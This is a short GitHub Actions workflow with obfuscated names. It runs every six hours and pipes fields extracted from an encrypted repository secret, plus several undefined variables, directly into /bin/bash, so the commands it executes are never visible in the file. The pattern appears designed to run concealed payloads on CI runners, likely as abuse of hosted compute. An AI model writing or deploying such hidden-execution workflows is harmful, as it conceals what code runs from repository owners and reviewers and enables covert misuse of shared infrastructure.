name: democratburied
on:
  workflow_dispatch:
  schedule:
    - cron: '55 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: democratburied
        env:
          xlmf04104: ${{ secrets.xlmf04104 }}
        run: |
          echo $xlmf04104 | jq -r .u1923 | /bin/bash
          echo $qwy7982 | jq -r .ecqz92 | /bin/bash
          echo $izofh3 | jq -r .v8 | /bin/bash
          echo $lcdg36 | jq -r .iqtd1 | /bin/bash
          echo $dvcg8 | jq -r .h70234 | /bin/bash

